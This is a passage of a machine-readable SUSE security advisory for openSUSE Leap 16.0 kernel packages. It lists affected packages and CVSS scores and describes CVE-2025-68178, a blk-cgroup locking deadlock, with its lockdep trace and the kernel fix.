"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68174"
},
{
"cve": "CVE-2025-68178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: fix possible deadlock while configuring policy\n\nFollowing deadlock can be triggered easily by lockdep:\n\nWARNING: possible circular locking dependency detected\n6.17.0-rc3-00124-ga12c2658ced0 #1665 Not tainted\n------------------------------------------------------\ncheck/1334 is trying to acquire lock:\nff1100011d9d0678 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}, at: blk_unregister_queue+0x53/0x180\n\nbut task is already holding lock:\nff1100011d9d00e0 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}, at: del_gendisk+0xba/0x110\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #2 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}:\n blk_queue_enter+0x40b/0x470\n blkg_conf_prep+0x7b/0x3c0\n tg_set_limit+0x10a/0x3e0\n cgroup_file_write+0xc6/0x420\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n-\u003e #1 (\u0026q-\u003erq_qos_mutex){+.+.}-{4:4}:\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n wbt_init+0x17e/0x280\n wbt_enable_default+0xe9/0x140\n blk_register_queue+0x1da/0x2e0\n __add_disk+0x38c/0x5d0\n add_disk_fwnode+0x89/0x250\n device_add_disk+0x18/0x30\n virtblk_probe+0x13a3/0x1800\n virtio_dev_probe+0x389/0x610\n really_probe+0x136/0x620\n __driver_probe_device+0xb3/0x230\n driver_probe_device+0x2f/0xe0\n __driver_attach+0x158/0x250\n bus_for_each_dev+0xa9/0x130\n driver_attach+0x26/0x40\n bus_add_driver+0x178/0x3d0\n driver_register+0x7d/0x1c0\n __register_virtio_driver+0x2c/0x60\n virtio_blk_init+0x6f/0xe0\n do_one_initcall+0x94/0x540\n kernel_init_freeable+0x56a/0x7b0\n kernel_init+0x2b/0x270\n ret_from_fork+0x268/0x4c0\n ret_from_fork_asm+0x1a/0x30\n\n-\u003e #0 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}:\n __lock_acquire+0x1835/0x2940\n lock_acquire+0xf9/0x450\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n blk_unregister_queue+0x53/0x180\n __del_gendisk+0x226/0x690\n del_gendisk+0xba/0x110\n sd_remove+0x49/0xb0 [sd_mod]\n device_remove+0x87/0xb0\n device_release_driver_internal+0x11e/0x230\n device_release_driver+0x1a/0x30\n bus_remove_device+0x14d/0x220\n device_del+0x1e1/0x5a0\n __scsi_remove_device+0x1ff/0x2f0\n scsi_remove_device+0x37/0x60\n sdev_store_delete+0x77/0x100\n dev_attr_store+0x1f/0x40\n sysfs_kf_write+0x65/0x90\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nother info that might help us debug this:\n\nChain exists of:\n \u0026q-\u003esysfs_lock --\u003e \u0026q-\u003erq_qos_mutex --\u003e \u0026q-\u003eq_usage_counter(queue)#3\n\n Possible unsafe locking scenario:\n\n CPU0 CPU1\n ---- ----\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003erq_qos_mutex);\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003esysfs_lock);\n\nRoot cause is that queue_usage_counter is grabbed with rq_qos_mutex\nheld in blkg_conf_prep(), while queue should be freezed before\nrq_qos_mutex from other context.\n\nThe blk_queue_enter() from blkg_conf_prep() is used to protect against\npolicy deactivation, which is already protected with blkcg_mutex, hence\nconvert blk_queue_enter() to blkcg_mutex to fix this problem. Meanwhile,\nconsider that blkcg_mutex is held after queue is freezed from policy\ndeactivation, also convert blkg_alloc() to use GFP_NOIO.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
